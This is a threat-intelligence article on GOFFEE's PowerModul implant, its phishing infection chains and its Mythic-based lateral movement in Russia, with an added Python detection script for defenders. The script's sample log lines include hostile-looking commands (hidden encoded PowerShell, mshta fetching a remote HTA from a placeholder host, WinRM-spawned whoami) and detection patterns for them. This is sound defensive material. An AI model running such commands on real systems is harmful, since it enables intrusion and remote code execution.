Threat actor GOFFEE has ramped up its cyber espionage activities with the introduction of PowerModul, a sophisticated PowerShell implant enabling advanced infiltration and remote command execution.
This campaign, targeting Russian organizations in key sectors such as government, energy, media, and telecommunications, marks a significant evolution in GOFFEE’s tactics and toolset.
Shift in Operational Strategy
Active since early 2022, GOFFEE initially relied on malicious IIS modules like Owowa for attacks.
However, by mid-2023, the group adopted patched instances of legitimate Windows system files such as explorer.exe, embedding shellcode in them to compromise systems during spear phishing campaigns.
Starting in 2024, GOFFEE shifted to deploying PowerModul, a highly capable PowerShell-based implant that communicates with command-and-control (C2) servers to download additional malware components, execute remote instructions, and exfiltrate sensitive data.
One hallmark of their current modus operandi is leveraging layered infection chains. Initial access is gained via spear phishing emails carrying RAR archives masquerading as legitimate documents.

According to the report, these archives contain either patched executables or Word documents embedding malicious VBA macros, which trigger a multi-stage payload delivery mechanism.
PowerModul, now central to GOFFEE’s campaigns, is a lightweight yet versatile PowerShell script designed for dynamic task execution.
Upon deployment, it uses system-specific identifiers such as usernames and disk serial numbers to establish secure communication with its dedicated C2 servers.
The implant supports payload transmission encoded in Base64, employing obfuscation techniques to avoid detection.
In addition to facilitating direct remote operations, PowerModul aids in executing tasks through secondary tools like PowerTaskel, FlashFileGrabber, and USB Worm.
FlashFileGrabber, for example, is designed to extract files from removable media and transmit them to attackers, while USB Worm propagates infections across systems via removable drives.

Increasing Use of Mythic Agent for Lateral Movement
GOFFEE has recently shifted its focus from PowerTaskel, a Mythic-based PowerShell agent, to a binary Mythic agent for lateral movement.
This custom agent is injected into memory during privileged operations, allowing the attackers to bypass traditional security measures.
The binary agent communicates with remote systems using protocols such as WinRM, thereby enabling seamless propagation across organizational networks.
In lateral movement phases, malicious payloads are often delivered over HTTP via the mshta.exe utility, using polyglot files that combine HTML Application (HTA) scripts with embedded shellcode.
These payloads execute highly obfuscated code that launches secondary attack scripts, further consolidating GOFFEE’s foothold within compromised environments.
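As an added example for defenders (not code from the report or from this article), the following Python script turns the behaviours described above into coarse process-creation detection rules and runs them over a handful of constructed Sysmon-style log lines: an Office process spawning a script host (macro-driven delivery), PowerShell launched with an encoded or Base64-decoding command line (PowerModul-style payload transport), mshta.exe fetching remote HTA content, and a process spawned under wsmprovhost.exe, the WinRM host process (lateral movement over WinRM). The key=value log layout, the field names and every sample line are assumptions made for the example; none of it is real telemetry.

```python
import base64
import re
from typing import List, Optional, Tuple

# Constructed sample log lines in an assumed key=value layout whose field
# names mirror Sysmon Event ID 1 (process creation). Not real telemetry.
SAMPLE_LOG = r"""
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE CommandLine=powershell.exe -nop -w hidden -enc SQBFAFgA
Image=C:\Windows\System32\mshta.exe ParentImage=C:\Windows\explorer.exe CommandLine=mshta.exe http://example.invalid/update.hta
Image=C:\Windows\System32\cmd.exe ParentImage=C:\Windows\System32\wsmprovhost.exe CommandLine=cmd.exe /c whoami
Image=C:\Windows\System32\notepad.exe ParentImage=C:\Windows\explorer.exe CommandLine=notepad.exe notes.txt
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine=powershell.exe -c "[Convert]::FromBase64String($p)"
"""

LINE_RE = re.compile(
    r"^Image=(?P<image>.*?) ParentImage=(?P<parent>.*?) CommandLine=(?P<cmdline>.*)$"
)
# -e / -enc / -EncodedCommand switches, or explicit Base64 decoding in-line.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand)?(?:\s|$)|FromBase64String")
URL_RE = re.compile(r"(?i)https?://")

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_log(text: str) -> List[Tuple[str, str, str]]:
    """Parse the assumed key=value layout into (image, parent, cmdline) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((basename(m["image"]), basename(m["parent"]), m["cmdline"]))
    return events


def apply_rules(image: str, parent: str, cmdline: str) -> List[str]:
    """Return the names of every rule one process-creation event triggers."""
    hits = []
    # Macro-laden Office document launching a script host.
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # PowerShell carrying an encoded command or decoding Base64 inline.
    if image in {"powershell.exe", "pwsh.exe"} and ENC_RE.search(cmdline):
        hits.append("encoded_powershell")
    # mshta.exe pulling HTA content from a remote HTTP(S) location.
    if image == "mshta.exe" and URL_RE.search(cmdline):
        hits.append("mshta_remote_content")
    # Child of the WinRM host process: command execution over WinRM.
    if parent == "wsmprovhost.exe":
        hits.append("winrm_spawned_process")
    return hits


def detect(text: str) -> List[Tuple[str, str]]:
    """Run every rule over every parsed event; return (rule, cmdline) alerts."""
    alerts = []
    for image, parent, cmdline in parse_log(text):
        for rule in apply_rules(image, parent, cmdline):
            alerts.append((rule, cmdline))
    return alerts


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Triage helper: recover the UTF-16LE script behind a -enc switch."""
    m = re.search(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    for rule, cmdline in detect(SAMPLE_LOG):
        print(f"[{rule}] {cmdline}")
        decoded = decode_encoded_command(cmdline)
        if decoded:
            print(f"    decoded: {decoded!r}")
```

Each rule maps to one behaviour the article attributes to GOFFEE, and each will fire on legitimate activity in some environments (administrators do use WinRM and encoded PowerShell), so treat the hits as triage starting points to be tuned against a baseline rather than as blocking rules. The decoder is there because an analyst's first question about an encoded command line is what it actually ran; the constructed sample decodes to the short string IEX.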
From July to December 2024, GOFFEE specifically targeted entities within Russia, focusing on sectors vital to national infrastructure.
The inclusion of government agencies and energy companies underscores the strategic intent behind these campaigns, signaling a preference for high-value data linked to operations, policies, and industrial processes.
Analysts attribute this campaign to GOFFEE with high confidence due to overlapping toolkits, victim profiles, and spear phishing techniques seen in earlier attacks.
While their new deployment of PowerModul and binary Mythic agents reflects tactical ingenuity, the consistent use of patched executables and layered infection chains ties them to their established identity.
These advancements highlight the evolving threat posed by GOFFEE, as they continuously refine their arsenal to circumvent detection and maximize impact.
Organizations in targeted sectors must bolster their security measures, particularly against phishing and PowerShell-based intrusions, to mitigate the risks from this increasingly adaptive adversary.